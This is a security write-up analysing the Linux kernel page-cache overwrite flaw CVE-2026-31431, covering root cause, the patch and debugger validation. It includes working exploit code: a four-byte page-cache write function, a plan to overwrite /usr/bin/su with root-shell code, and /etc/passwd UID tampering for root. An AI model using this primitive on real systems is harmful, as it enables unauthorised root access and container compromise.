1. Introduction
In late April 2026, security researcher Taeyang Lee publicly disclosed a Linux kernel vulnerability assigned CVE-2026-31431 and gave it an ironic name: Copy Fail.
The name captures the essence of the bug. In 2017, a kernel developer fixed an AF_ALG crypto-interface bug where AAD was not copied from src to dst. The fix introduced an in-place optimization. The optimization was reasonable by itself, but it unintentionally broke a long-standing implicit assumption in another module of the kernel crypto subsystem, authencesn: the destination buffer is contiguous kernel memory, and writing a few bytes into it has no side effects.
When these two independent subsystems meet the Page Cache through splice(), an unprivileged local user can write four controlled bytes into the page cache of any readable file on the system.
This is not a conventional out-of-bounds write or use-after-free. Its impact is more subtle and more far-reaching:
- Local privilege escalation: repeated writes can overwrite the ELF header of
/usr/bin/suand lead to a root shell. - Zero-privilege cross-container attack: containers in different namespaces on the same host can share the page cache for image layers, allowing one container to corrupt binaries used by another container.
- Read-only mount bypass: the target file only needs to be opened with
O_RDONLY; a read-only volume no longer prevents page-cache modification. - Default security controls fail to stop it: the default Docker/Kubernetes seccomp profile and the SELinux targeted policy do not block exploitation.
The vulnerability affects mainstream Linux distribution kernels released between 2017 and 2026 and remained latent for almost nine years. It is rated CVSS 7.8 High.
Timeline
Date Event 2011 The authencesnmodule was introduced. The ESN scratch write was harmless in its original usage.2015 AF_ALG gained AEAD and splicesupport, but still used an out-of-place design.2017-07 Commit 72548b093ee3introduced the in-place optimization and created the vulnerable behavior.2026-03-23 The bug was reported to the Linux kernel security team. 2026-04-01 Patch a664bf3d603dwas merged into mainline.2026-04-22 CVE-2026-31431 was assigned. 2026-04-29 Public disclosure. 2026-05-01 CISA added the issue to the KEV catalog, with a remediation due date of 2026-05-15. 2026-05-04 Docker 29.4.2 changed the default seccomp behavior to block AF_ALG; RHEL 9 and 10 kernel fixes were released. 2026-05-06 Docker 29.4.3 fixed the 29.4.2 regression and switched to AppArmor/SELinux enforcement for AF_ALG; RHEL 8 fixes were released. 2026-05-07 Dirty Frag, affecting ESP/RxRPC subsystems with a similar primitive, was publicly disclosed.
This article starts with the background needed to understand the trigger path, then walks through root cause analysis, PoC behavior, and kernel-level dynamic validation. It then systematically explores host privilege-escalation paths and container attack scenarios, including their practical boundaries. The final sections cover mitigation and a page-cache integrity detection design based on O_DIRECT and fanotify.
2. Background
Understanding Copy Fail requires several kernel concepts. Their dependencies can be summarized as follows:
Scatterlist (SGL) AEAD Crypto Page Cache
| | | |
scatterwalk AAD authencesn splice()
| | | |
+--------+-------+ | |
| | |
AF_ALG -------------+ |
| |
algif_aead --------------------------+
We will go through them one by one.
2.1 Page Cache: Linux's Global File Cache
When a process reads /usr/bin/cat through read(), the kernel does not fetch the data from disk every time. It first checks a memory area called the Page Cache. If the corresponding file page is already cached, the kernel returns the cached data directly.
Several Page Cache properties are directly relevant to this vulnerability:
Globally shared. The Page Cache is indexed by (inode, page_offset). It does not belong to any specific process. All processes on the same machine that access the same inode hit the same page-cache entry. After process A loads a file into the page cache through read(), process B reads the same file from cache without touching disk again.
Writeback semantics. For modifications made through the normal write() path, the kernel marks the page as dirty and later writes it back to disk through the writeback mechanism. If a kernel path bypasses the VFS layer and directly modifies a page-cache page, the dirty bit is not set. The modification only lives in memory and disappears after reboot or after the page is dropped from cache.
Immediate visibility. Once a page-cache page is modified, later read() calls immediately see the modified content, regardless of how that modification happened. This includes other processes on the same host and, in container environments, processes that share the same lower-layer inode through overlayfs. Section 6.1 covers that in detail.

2.2 Scatterlist: Scatter-Gather Lists
Inside the kernel, logically contiguous data, such as a 10 KB encryption payload, is often stored across multiple non-contiguous physical 4 KB pages. To describe which pages and offsets make up that logical data range, the kernel uses scatterlists (SGLs).
Each struct scatterlist entry describes a contiguous physical memory range:
struct scatterlist {
unsigned long page_link; // pointer to struct page, or CHAIN to another SGL array
unsigned int offset; // starting offset inside the page
unsigned int length; // data length
};
When a single SGL array is not enough, multiple arrays can be connected through SG_CHAIN. The final entry no longer points to a data page; instead, its page_link points to the start of another SGL array. The scatterwalk iterator hides this linked structure from callers.
The design is sound by itself. The problem appears when some entries in the SGL do not point to ordinary kernel-allocated memory but to pages in the page cache. A write to such an SGL entry is equivalent to directly modifying cached file content. That is the core exploitation point in Copy Fail.

2.3 splice: The Cost of Zero Copy
splice() is a high-performance Linux data-transfer system call. Its main idea is to avoid copying data back and forth between kernel space and user space. Instead, it moves page references between kernel pipe buffers.
A normal read() plus write() flow copies file data into a user-space buffer and then copies it back into the kernel for the destination. splice() directly transfers references to the file's page-cache pages to the other side of a pipe, without copying the data itself.

In the AF_ALG crypto interface, splice() can feed file content directly into a crypto algorithm. The file's page-cache pages are placed directly into the TX SGL. The page_link fields in those SGL entries point to globally shared page-cache pages. This is the critical design decision: if any later code path writes to that SGL, it writes to the file's page cache.
2.4 AF_ALG: User-Space Crypto Interface
The Linux kernel exposes a crypto API to user space through AF_ALG (Address Family: Algorithm). The API is socket-based:
import socket, os
AF_ALG = 38
SOL_ALG = 279
# 1. Create an AF_ALG socket and choose the crypto algorithm.
alg_sock = socket.socket(AF_ALG, socket.SOCK_SEQPACKET, 0)
# Bind the algorithm name, for example an AEAD algorithm such as gcm(aes).
alg_sock.bind(("aead", "gcm(aes)"))
alg_sock.setsockopt(SOL_ALG, 1, key_bytes) # ALG_SET_KEY
alg_sock.setsockopt(SOL_ALG, 4, None, 16) # ALG_SET_AEAD_AUTHSIZE
# 2. accept() returns an operation socket.
op_sock = alg_sock.accept()[0]
# 3. sendmsg() sends data to be encrypted or decrypted.
# Control messages specify operation type, IV, AAD length, and other parameters.
op_sock.sendmsg([plaintext_data], control_messages)
# 4. recv() receives the result. The kernel performs the actual crypto operation here.
result = op_sock.recv(output_buffer_size)
AF_ALG also supports feeding file content to a crypto algorithm through splice(), avoiding copies between kernel space and user space. This feature is essential to the Copy Fail exploit chain: the data that enters through splice is stored in the TX SGL as page-cache page references, not as copied bytes.
In the kernel, algif_aead.c handles AEAD requests. It manages the TX SGL, which contains data sent by the user, and the RX SGL, which points to the user's receive buffer. It eventually calls a lower-level crypto algorithm, such as authencesn, to perform the actual encryption or decryption.
2.5 AEAD and authencesn's Scratch Write
AEAD stands for Authenticated Encryption with Associated Data. It provides confidentiality and integrity at the same time. Its data format is:
Input: AAD (Associated Data) || Ciphertext || Auth Tag
Output: AAD || Plaintext
AAD is associated data that is not encrypted but is authenticated. Ciphertext is the encrypted data, and Auth Tag is the authentication tag.
authencesn is an AEAD implementation in the Linux kernel. Its full name is "authenc with Extended Sequence Number". It was designed for IPsec ESN.
What AAD means
In AEAD, AAD is additional data that must be authenticated but does not need to be encrypted. In TLS, AAD can be the record header: content type, protocol version, and length. In IPsec, AAD includes the security parameter index and sequence number. The concrete content varies by protocol, but the AEAD layer only needs to know that the first assoclen bytes are AAD.
Why authencesn writes into the dst buffer
The ESN protocol uses a 64-bit sequence number to prevent wraparound attacks. Only the low 32 bits are transmitted on the wire; the high 32 bits are maintained locally by the peers. authencesn needs the full 64-bit sequence number during HMAC computation. It handles this as follows:
- Put the high 32 bits of the sequence number in
AAD[4:8]. - Before calculating HMAC, temporarily write
AAD[4:8]into the place in the destination buffer where the auth tag normally resides, so the HMAC covers the full sequence number. - Restore state after HMAC calculation.
This temporary write is the ESN scratch write:
// crypto/authencesn.c - crypto_authenc_esn_decrypt()
// Read the first eight bytes from AAD.
scatterwalk_map_and_copy(tmp, req->dst, 0, 8, 0);
// In the IPsec case: tmp[0] = SPI, tmp[1] = SeqNo_Hi
unsigned int cryptlen = req->cryptlen;
cryptlen -= authsize; // locate the beginning of the auth-tag area
// Temporarily write AAD[4:8] into the tag area in dst for HMAC calculation.
scatterwalk_map_and_copy(tmp + 1, req->dst, assoclen + cryptlen, 4, 1);
// ^^^^^^^^ ^
// AAD[4:8] 4 bytes, 1 = write
The write size is hard-coded to four bytes (sizeof(u32)), and the value comes from AAD[4:8].
In normal IPsec usage, req->dst points to a contiguous buffer allocated by the kernel with kmalloc, and AAD[4:8] is legitimate sequence-number data. The temporary write and restoration are harmless.
The attack surface opened by AF_ALG
Through AF_ALG, however, user space can directly invoke the authencesn algorithm and fully control the AAD content. authencesn does not validate whether AAD[4:8] is a real ESN sequence number. It simply writes these four bytes into a fixed offset of dst.
If the attacker places the desired page-cache bytes in AAD[4:8], authencesn faithfully writes them to a fixed offset of dst.
The obvious question is: what if req->dst does not contain a kmalloc buffer, but page-cache pages?
3. Root Cause Analysis
3.1 How the Vulnerability Was Introduced: A Reasonable Optimization
In July 2017, kernel developer Stephan Mueller submitted commit 72548b093ee3, titled "crypto: algif_aead - copy AAD from src to dst".
The commit fixed a real bug. Before this change, the algif_aead decryption path used an out-of-place mode:
// Before 2017: out-of-place
aead_request_set_crypt(&areq->aead_req,
areq->tsgl, // req->src = TX SGL (input data)
areq->first_rsgl.sgl.sg, // req->dst = RX SGL (user receive buffer)
used, ctx->iv);
The TX SGL contained all data sent through sendmsg() and splice(): AAD, ciphertext, and authentication tag. The RX SGL pointed to the user-space receive buffer. The AEAD specification requires the decrypted output to include AAD, but lower-level algorithms only process the ciphertext. The caller must copy AAD from src to dst. The old algif_aead code did not do that, so the AAD area in the user's output was zeroed.
Commit 72548b093ee3 fixed this in three steps:
- Copy AAD and ciphertext from TX SGL to the RX buffer using
memcpy_sglist, so AAD appears in the output. - Chain the TX SGL pages that contain the auth tag to the tail of the RX SGL through
sg_chain(), because AEAD decryption still needs the tag for authentication, even though the tag is not part of the output. - Set
req->src = req->dst = RX SGL, where the RX SGL now contains AAD, ciphertext, and the chained tag pages.
// Vulnerable code after 2017: in-place
// Step 1: copy AAD + ciphertext into the RX buffer
memcpy_sglist(rsgl, tsgl_src, outlen); // outlen = assoclen + cryptlen - authsize
// Step 2: pull tag pages from the TX SGL
af_alg_pull_tsgl(sk, processed, areq->tsgl, processed - as);
// Step 3: chain them to the tail of the RX SGL
sg_chain(rsgl_sg, rsgl_nents, areq->tsgl);
// Step 4: in-place, src and dst both point to the combined RX SGL
aead_request_set_crypt(&areq->aead_req,
rsgl_src, // req->src = RX SGL, including chained tag pages
rsgl_dst, // req->dst = RX SGL, the same object
used, ctx->iv);
Functionally, this solved the AAD copy bug. The problem is in the tag pages pulled in Step 2. They come from the TX SGL, and data that entered the TX SGL through splice() directly references file page-cache pages. These page-cache pages are now chained into req->dst.
3.2 Conflicting Design Assumptions
The essence of the bug is an implicit assumption conflict between two subsystems:
| Subsystem | Assumption |
|---|---|
authencesn (2011) |
req->dst is a contiguous kmalloc buffer, so a scratch write has no side effects. |
algif_aead optimization (2017) |
The tail of req->dst may contain page-cache pages chained from the TX SGL. |
In every other authencesn call path, mainly IPsec/xfrm, dst is indeed a kernel-allocated contiguous buffer. The algif_aead in-place optimization was the first, and effectively the only, path that could place page-cache pages inside the req->dst SGL.
3.3 Complete Trigger Path

Now let us walk through the whole trigger sequence. Assume the goal is to write four controlled bytes at offset t in a target file.
Step 1: user space sends data
The exploit uses the following parameters:
assoclen = 8, specified through the control message passed tosendmsg.authsize = 4, set throughsetsockopt(ALG_SET_AEAD_AUTHSIZE).
Then data is sent to the AF_ALG socket in two stages:
# Four bytes to write.
evil_bytes = b'\xde\xad\xbe\xef'
# Step 1: send eight bytes of AAD through sendmsg.
# AAD[0:4] = arbitrary padding, AAD[4:8] = bytes to write to the page cache.
# authencesn will treat AAD[4:8] as ESN seqno_lo and write it to the scratch area.
aad = b'\x00\x00\x00\x00' + evil_bytes # 8 bytes
op.sendmsg([aad], cmsg, MSG_MORE) # MSG_MORE means more data follows.
# Step 2: splice the first t + 4 bytes of the target file into the AF_ALG socket.
# splice passes page-cache page references without copying data.
pipe_r, pipe_w = os.pipe()
target_fd = os.open("/usr/bin/su", os.O_RDONLY)
os.splice(target_fd, pipe_w, t + 4, offset_src=0) # file -> pipe
os.splice(pipe_r, op.fileno(), t + 4) # pipe -> AF_ALG socket
Step 2: TX SGL layout
After the two sends, the kernel's TX SGL contains:
TX SGL:
+--------------------+----------------------------------------+
| sendmsg data (8B) | splice data (t+4 bytes) |
| AAD: 4 zero bytes | file[0:t+4] |
| + evil_bytes | page-cache page refs via splice |
| (kmalloc memory) | (points to GLOBAL SHARED page cache) |
+--------------------+----------------------------------------+
From AEAD decryption's point of view, this data is interpreted as:
- AAD = the first
assoclen=8bytes = four zero bytes plusevil_bytesfromsendmsg. - Ciphertext = the middle
tbytes =file[0:t]. - Auth Tag = the final
authsize=4bytes =file[t:t+4].
Total byte count is 8 + t + 4 = t + 12.
Step 3: recv triggers decryption and in-place SGL construction
Calling recv() triggers _aead_recvmsg(). The vulnerable code does the following:
outlen = assoclen + (cryptlen - authsize) = 8 + ((t+4) - 4) = t + 8
(1) memcpy_sglist(RX buffer, TX SGL, outlen=t+8):
Copy first t+8 bytes of TX SGL to the RX buffer (user-space allocated memory).
RX buffer contents:
[0:8] = copy of AAD (sendmsg data)
[8:8+t] = copy of file[0:t] (ciphertext portion)
Note: this is a DATA COPY, not a page reference.
(2) af_alg_pull_tsgl(TX SGL, skip=t+8, take=4):
Skip the first t+8 bytes of TX SGL and extract the final 4 bytes (tag region).
These four bytes correspond to file[t:t+4] from splice.
-> SGL entry: { page = file's page-cache page, offset = t % 4096, length = 4 }
-> This is the ORIGINAL page-cache reference, not a copy.
(3) sg_chain(RX SGL tail, tag SGL):
Chain the tag page reference to the end of RX SGL.
The final combined destination SGL, which is also the source SGL, looks like this:
combined dst SGL (= req->src = req->dst):
+-- RX buffer (user-space, safe) ---+ +-- chained tag (PAGE CACHE) ------+
| | | |
| AAD (8B) | ciphertext (tB) |->| file[t:t+4] in page cache |
| | = copy of file[0:t] | | original page ref from splice |
| | | |
+-- offset 0 t+8 -----+ +-- offset t+8 t+12 --+
The key point is that the RX-buffer portion is safe user memory allocated by the kernel, but the chained tag pages at the tail are original page-cache references from the file.
Step 4: authencesn scratch write hits the page cache
crypto_authenc_esn_decrypt() starts running. The destination offset for the ESN scratch write is computed as follows:
// scratch write in crypto_authenc_esn_decrypt()
// First read AAD[0:8].
scatterwalk_map_and_copy(tmp, req->dst, 0, 8, 0); // tmp[0]=AAD[0:4], tmp[1]=AAD[4:8]
unsigned int cryptlen = req->cryptlen; // = t + 4, ciphertext plus tag
cryptlen -= authsize; // = t + 4 - 4 = t
// Write tmp[1] (= AAD[4:8] = evil_bytes) into dst[assoclen + cryptlen].
scatterwalk_map_and_copy(tmp + 1, req->dst, assoclen + cryptlen, 4, 1);
// ^^^^^^^^ ^^^^^^^^^^^^^^^^ ^
// = AAD[4:8] = 8 + t write direction
// = evil_bytes
The write position is offset 8 + t in the destination SGL. Comparing that with the combined SGL layout above:
- The RX-buffer portion occupies
[0, t+8), for a total oft+8bytes. - The chained tag pages start at offset
t+8.
Therefore, 8 + t is exactly the boundary of the RX buffer and the start of the chained tag pages.
Those tag pages are original page-cache references to file[t:t+4]. The scratch write therefore writes four bytes to offset t of the file's page cache.
The written value is tmp[1] = AAD[4:8] = evil_bytes, supplied through sendmsg.
At this point the chain is complete: the write offset is controlled by the splice() length, which determines t, and the write content is controlled by AAD[4:8] from sendmsg. Both are freely controlled from user space.
Why the write is not undone
After decryption, crypto_authenc_esn_decrypt_tail() attempts to restore data overwritten by the scratch write. The critical detail is that it first reads the current value at dst[8+t], which is already the payload, and then writes AAD back to dst[0:8]. It never writes the original value back to dst[8+t].
The HMAC verification will fail because the data has been modified, and recvmsg returns -EBADMSG. But the page-cache write has already happened and is not rolled back. An exploit simply ignores this error.
3.4 Control Analysis
Write offset. The attacker controls t by adjusting the splice() length, which is t + authsize = t + 4. Each invocation can target an arbitrary file offset.
Write value. The attacker fully controls AAD[4:8], sent through sendmsg.
Write size. The write size is fixed at four bytes. It is not controlled by setsockopt(ALG_SET_AEAD_AUTHSIZE). authsize only affects the offset calculation through cryptlen -= authsize. The four-byte size is hard-coded in authencesn as sizeof(u32), the size of the high 32 bits of the ESN sequence number. A single call cannot change the size, but repeated calls can overwrite a continuous file range.
Target file. Any file the current user can read is a target. The PoC opens the file with O_RDONLY. No write permission is required because the write path bypasses VFS permission checks.
Summary:
Write target: file page cache[t : t+4]
Write value: AAD[4:8] sent through sendmsg (4 bytes, fully controlled)
Write size: fixed 4 bytes (u32 hard-coded in authencesn)
Trigger: assoclen=8, authsize=4, splice length=t+4
Permission: O_RDONLY is enough; no write permission required
Root cause: chained tag pages at the tail of dst SGL are original page-cache references from splice
3.5 Patch Analysis
The fix, commit a664bf3d603d, states:
This mostly reverts commit 72548b093ee3 except for the copying of the associated data. There is no benefit in operating in-place in algif_aead since the source and destination come from different mappings.
The fix removes in-place mode and makes req->src and req->dst point to different SGLs again:
// After the fix: out-of-place
// src = TX SGL, which may contain page-cache pages, but is read-only
// dst = RX SGL, a pure user-space buffer
aead_request_set_crypt(&areq->aead_req,
tsgl_src, // req->src = TX SGL
rsgl_dst, // req->dst = RX SGL, independent
used, ctx->iv);
// AAD is explicitly copied into the RX buffer.
memcpy_sglist(rsgl_src, tsgl_src, ctx->aead_assoclen);
After the fix, req->dst only contains the user's RX buffer. It no longer contains page-cache pages. The authencesn scratch write lands in the user's receive buffer and has no security impact.
The patch removes roughly 92 lines of code: tag-page chaining, the in-place branch, the offset parameter added to af_alg_pull_tsgl, and other complexity needed only for in-place operation. The sg_chain() call is eliminated completely, so page-cache pages no longer have a path into req->dst.
4. PoC Analysis and Dynamic Validation
4.1 Public PoC Structure
The public Copy Fail PoC is a heavily obfuscated 732-byte Python script. It nests the real exploit code through base64 and zlib compression. After deobfuscation, the core is a function named page_cache_write_4bytes(fd, offset, value), which executes the trigger path described above and writes four bytes to the page cache of the file represented by fd.
The full PoC flow is:
- Open
/usr/bin/su, a SUID-root binary, as read-only. - Repeatedly call
page_cache_write_4bytes()to overwrite the first 160 bytes of/usr/bin/su's ELF header with a carefully constructed ELF payload containing shellcode for a root shell. - Execute the modified
/usr/bin/suand obtain a root shell.
One important detail is that the PoC opens the target with O_RDONLY. Normal VFS writes through a read-only file descriptor would be rejected by the kernel. Copy Fail does not use the VFS write path; it writes to page-cache pages through the crypto subsystem's scratch write. Therefore any readable file is a potential target, including files mounted read-only.
4.2 Core Function
The deobfuscated core function, aligned with the data flow in Section 3, is:
AF_ALG = 38
SOL_ALG = 279
ASSOCLEN = 8 # AAD length
AUTHSIZE = 4 # auth-tag size; also affects offset calculation
def page_cache_write_4bytes(fd, offset, value):
"""Write value (4 bytes) to page_cache[offset : offset+4] of the file represented by fd."""
# Create an AF_ALG socket and bind authencesn(hmac(sha256),cbc(aes)).
s = socket.socket(AF_ALG, socket.SOCK_SEQPACKET, 0)
s.setsockopt(SOL_ALG, 2, # ALG_SET_KEY: all-zero key, content does not affect the trigger
b'\x08\x00\x01\x00' # rtattr header
b'\x00\x00\x00\x10' # enckeylen=16 (AES-128)
+ b'\x00' * 32) # 16B authkey + 16B enckey
s.setsockopt(SOL_ALG, 4, None, AUTHSIZE) # ALG_SET_AEAD_AUTHSIZE = 4
op = s.accept()[0]
# Build 8 bytes of AAD: first 4 bytes are zero padding, last 4 bytes are the value.
# authencesn writes AAD[4:8] (= value) to dst[assoclen + cryptlen].
aad = b'\x00' * 4 + value # 8 bytes
op.sendmsg([aad],
[(SOL_ALG, 2, b'\x00' * 4), # ALG_OP_DECRYPT
(SOL_ALG, 3, b'\x10' + b'\x00' * 19), # IV = 16 zero bytes
(SOL_ALG, 4, struct.pack('I', ASSOCLEN))], # assoclen = 8
socket.MSG_MORE)
# splice target file [0, offset+4) into the AF_ALG socket.
# splice passes page-cache page references without copying.
pr, pw = os.pipe()
os.splice(fd, pw, offset + AUTHSIZE, offset_src=0)
os.splice(pr, op.fileno(), offset + AUTHSIZE)
try:
op.recv(ASSOCLEN + offset) # triggers _aead_recvmsg -> authencesn scratch write
except OSError:
pass # HMAC failure returns EBADMSG, but the page-cache write has completed
op.close(); s.close(); os.close(pr); os.close(pw)
4.3 QEMU and GDB Kernel-Level Validation
To validate the full trigger path at kernel level, I built a controlled debugging environment: Linux 6.12.8 with debug symbols running inside QEMU, with GDB connected remotely and breakpoints placed on key functions to capture the complete execution chain.
Experiment code
The scripts and configuration files for this section are in the QEMU debug environment package. The GDB breakpoint scripts are separate. URL links have been intentionally removed from this blog version.
4.3.1 Building the Debug Environment
The debug environment is built through Docker to avoid setting up a cross-compilation toolchain on macOS. It produces three files: a compressed kernel bzImage, a debug-symbol vmlinux, and an initramfs containing BusyBox and the PoC utility.
# Build kernel + BusyBox + PoC through Docker. This takes about ten minutes.
docker build -t copyfail-build -f Dockerfile .
docker run --rm -v $(pwd)/output:/output copyfail-build
# Outputs:
# output/bzImage - compressed kernel (4.8 MB)
# output/vmlinux - DWARF debug symbols (126 MB), used by GDB
# output/rootfs.cpio.gz - initramfs, including BusyBox and poc_pagecache_write
Key kernel configuration options:
CONFIG_CRYPTO_USER_API_AEAD=y # AF_ALG AEAD interface
CONFIG_CRYPTO_AUTHENC=y # authenc module
CONFIG_CRYPTO_SEQIV=y # sequence-number IV
CONFIG_DEBUG_INFO_DWARF5=y # full debug symbols
CONFIG_GDB_SCRIPTS=y # GDB helper scripts
CONFIG_KALLSYMS_ALL=y # expose all kernel symbols
Start the QEMU VM:
# Normal mode: boot directly into a shell.
./run_qemu.sh
# Debug mode: QEMU pauses and waits for GDB on :1234.
./run_qemu.sh debug
Connect from another terminal:
gdb ./vmlinux -ex 'target remote :1234' -ex 'continue'
4.3.2 Experiment 1: Verifying Page-Cache Writes
Inside the QEMU VM shell, run the automated experiment:
# === inside the VM ===
# 1. Create a test file.
echo "AABBCCDD EEFFGGHH IIJJKKLL MMNNOOPP" > /tmp/target.txt
hexdump -C /tmp/target.txt
# 00000000 41 41 42 42 43 43 44 44 20 45 45 46 46 47 47 48 |AABBCCDD EEFFGGH|
# 00000010 48 20 49 49 4a 4a 4b 4b 4c 4c 20 4d 4d 4e 4e 4f |H IIJJKKLL MMNNO|
# 00000020 4f 50 50 0a |OPP.|
# 2. First write: offset 0, value 0xDEADBEEF.
poc_pagecache_write /tmp/target.txt 0 0xDEADBEEF
# [*] Target: /tmp/target.txt
# [*] Offset: 0 (0x0)
# [*] Value: 0xdeadbeef
# [*] Writing 4 bytes to page cache...
# [+] Done. Page cache of /tmp/target.txt at offset 0 should now contain 0xdeadbeef
# 3. Verify the result.
hexdump -C /tmp/target.txt | head -2
# 00000000 ef be ad de 43 43 44 44 20 45 45 46 46 47 47 48 |....CCDD EEFFGGH|
# ^^^^^^^^^^^
# 0xDEADBEEF (little-endian)
# 4. Second write: offset 8, value 0xCAFEBABE.
poc_pagecache_write /tmp/target.txt 8 0xCAFEBABE
# 5. Verify that the two writes do not interfere with each other.
hexdump -C /tmp/target.txt | head -2
# 00000000 ef be ad de 43 43 44 44 be ba fe ca 46 47 47 48 |....CCDD....FGGH|
# ^^^^^^^^^^^
# 0xCAFEBABE (little-endian)
# 6. Verify drop_caches behavior. Files on tmpfs do not revert.
echo 3 > /proc/sys/vm/drop_caches
hexdump -C /tmp/target.txt | head -2
# 00000000 ef be ad de 43 43 44 44 be ba fe ca 46 47 47 48 |....CCDD....FGGH|
# On tmpfs: data only lives in page cache, and drop_caches does not evict it.
# On disk filesystems such as ext4: drop_caches reloads the original data from disk.
Conclusion: the four-byte page-cache write primitive works. The offset is precise, and repeated writes do not interfere with each other.
4.3.3 Experiment 2: GDB Evidence Chain, SGL Layout, and Scratch Write
This is the most important validation step. GDB observes req->src == req->dst at the entry of crypto_authenc_esn_decrypt, proving that the vulnerable in-place path is active, and then traces the write operation in scatterwalk_map_and_copy until it lands on a page-cache page.
# === terminal 1: start QEMU in debug mode ===
./run_qemu.sh debug
# === Debug mode: QEMU paused, waiting for GDB on localhost:1234 ===
# === terminal 2: connect GDB and load the Python breakpoint script ===
gdb ./vmlinux -x exp3_2_gdb.py
# [GDB Script] Setting up breakpoints for Experiment 3.2+3.3...
# Breakpoint 1 at 0xffffffff812984f8: file crypto/authencesn.c, line 263.
# [GDB] BP1: crypto_authenc_esn_decrypt (entry)
# Breakpoint 2 at 0xffffffff8128f93e: file crypto/scatterwalk.c, line 57.
# [GDB] BP2: scatterwalk_map_and_copy (writes only)
(gdb) target remote :1234
(gdb) continue
After running poc_pagecache_write /tmp/target.txt 0 0xDEADBEEF inside the VM, GDB captures the following output:
============================================================
=== crypto_authenc_esn_decrypt ENTRY ===
req = 0xffff888002d96a90
req->src = 0xffff888002d96820
req->dst = 0xffff888002d96820
src == dst: YES (IN-PLACE!) <- root cause confirmed
assoclen = 8
cryptlen = 4 (before -= authsize)
============================================================
--- dst SGL entries ---
SGL[0]: page_link=0xffffea000006f440 offset=1760 length=8
SGL[1]: page_link=0xffff8880027cbda1 offset=0 length=0 [CHAIN]
SGL[2]: page_link=0xffffea000006f8c2 offset=0 length=4 [LAST]
=== [HIT 1] scatterwalk_map_and_copy WRITE ===
buf=0xffffc90000113d20 sg=0xffff888002d96820 start=4 nbytes=4
writing value: 0x41414141
backtrace:
#0 scatterwalk_map_and_copy
#1 crypto_authenc_esn_decrypt <- seqno_hi written to dst[4..7]
#2 _aead_recvmsg
#3 aead_recvmsg
#4 sock_recvmsg_nosec
#5 sock_recvmsg
=== [HIT 2] scatterwalk_map_and_copy WRITE ===
buf=0xffffc90000113d24 sg=0xffff888002d96820 start=8 nbytes=4
writing value: 0xdeadbeef <- scratch write hits page cache
backtrace:
#0 scatterwalk_map_and_copy
#1 crypto_authenc_esn_decrypt <- dst[assoclen+cryptlen] = dst[8+0] = page cache
#2 _aead_recvmsg
...
=== [HIT 3] scatterwalk_map_and_copy WRITE ===
buf=0xffffc90000113cc8 sg=0xffff888002d96820 start=0 nbytes=8
writing value: 0x41414141
backtrace:
#0 scatterwalk_map_and_copy
#1 crypto_authenc_esn_decrypt_tail <- ESN header restore after HMAC cleanup
...
Key interpretation:
| Field | Meaning |
|---|---|
src == dst: YES |
Confirms in-place mode introduced by 72548b093ee3. |
SGL[1]: [CHAIN] |
sg_chain() linked tag pages to the RX SGL. |
SGL[2]: offset=0 length=4 [LAST] |
The tag page is the file's page-cache page at offset 0. |
HIT 2: value=0xdeadbeef start=8 |
The scratch write targets dst[8], exactly the start of the chained tag page. |
The SGL layout and call chain are fully captured: recv() -> _aead_recvmsg -> crypto_authenc_esn_decrypt -> scatterwalk_map_and_copy(WRITE) -> page cache.
4.3.4 Experiment 3: Comparing with the Patched Kernel
Under the same environment, boot a 6.12.85 kernel containing patch a664bf3d603d and repeat the experiment:
# Start with the patched kernel.
BZIMAGE=bzImage.patched VMLINUX=vmlinux.patched ./run_qemu.sh debug
GDB output after the fix:
============================================================
=== crypto_authenc_esn_decrypt ENTRY ===
req = 0xffff888002dcea90
req->src = 0xffff888002e6d880
req->dst = 0xffff888002dce820
src == dst: NO <- fixed: out-of-place mode
assoclen = 8
cryptlen = 4 (before -= authsize)
============================================================
--- dst SGL entries ---
SGL[0]: page_link=0xffffea000006f582 offset=1760 length=8 [LAST]
^^^^
Only one entry: no CHAIN and no page-cache page.
=== [HIT 1] scatterwalk_map_and_copy WRITE ===
writing value: 0x41414141
sg->page_link = 0xffffea000006f582 <- RX buffer, safe
=== [HIT 2] scatterwalk_map_and_copy WRITE ===
writing value: 0xdeadbeef
sg->page_link = 0xffffea000006f582 <- RX buffer again, harmless
| Item | Vulnerable kernel (6.12.8) | Patched kernel (6.12.85) |
|---|---|---|
src == dst |
Yes, in-place | No, out-of-place |
| dst SGL entries | 3 entries, including CHAIN and a page-cache page | 1 entry, RX buffer only |
| scratch-write target | page-cache page | RX buffer |
| page cache after execution | modified | unchanged |
5. A Recurring Vulnerability Pattern: Page-Cache Overwrite
Dirty Pipe in 2022, Copy Fail in 2026, and the later Dirty Frag bugs share a clear pattern: splice() zero-copy injects file page-cache page references into a kernel subsystem, and a code path in that subsystem writes to those references. The concrete writes differ: pipe merge, crypto scratch write, and in-place decrypt. The result is the same: file page cache is modified without going through the VFS write path.
| Vulnerability | Year | Mechanism | Deterministic write | Page-cache only |
|---|---|---|---|---|
| Dirty Pipe (CVE-2022-0847) | 2022 | pipe flag initialization bug plus splice |
Yes | Yes |
| Copy Fail (CVE-2026-31431) | 2026 | AF_ALG in-place optimization plus splice |
Yes | Yes |
| Dirty Frag (CVE-2026-43284/43500) | 2026 | xfrm-ESP / RxRPC in-place decryption plus splice |
Yes | Yes |
Their trigger paths differ, but the core result is shared: a kernel path bypasses VFS write-permission checks and directly modifies file page-cache content through page references injected by splice. Because the modification does not pass through the VFS write path, the page is not marked dirty. The original file on disk is unaffected. The tampering exists only in memory and disappears after reboot or drop_caches.

The older Dirty COW vulnerability achieved a similar unauthorized file-data modification through a different mechanism: an mmap copy-on-write race plus GUP. Dirty COW does not involve splice or in-place operation. After the race succeeds, the modified page is marked dirty and written back to disk. It is a different class of bug.
Once the primitive is equivalent, the exploitation surface is also similar. The following sections use Copy Fail as the example primitive: a four-byte controlled write to the page cache of any readable file. All paths below were experimentally confirmed on CentOS Stream 8 with an unpatched 4.18.0-553 kernel, and the conclusions apply to page-cache overwrite bugs of the same class.
Experiment code
The PoC scripts for host attacks are part of the page-cache guard experiment set. URL links have been removed from this blog version.
5.1 /etc/passwd UID Tampering
/etc/passwd is 0644 on all Linux distributions and is world-readable, making it a natural target.
The idea is to change the UID field of a target user from 1000 to 0000, which only requires changing one ASCII digit. Linux identifies root by UID 0.
# Before: testuser123:x:1000:1000::/home/testuser123:/bin/bash
python3 exp_passwd_uid.py testuser123
# [+] SUCCESS: UID changed to 0000 in page cache
id testuser123
# uid=0(root) gid=0(root) groups=0(root)
su - testuser123
# whoami -> root
# /etc/shadow is readable
# Restore.
echo 3 > /proc/sys/vm/drop_caches
A single four-byte write is enough for privilege escalation. No shellcode or ELF knowledge is needed, and the path is distribution-independent. Since PG_dirty is not set, drop_caches restores the original content.
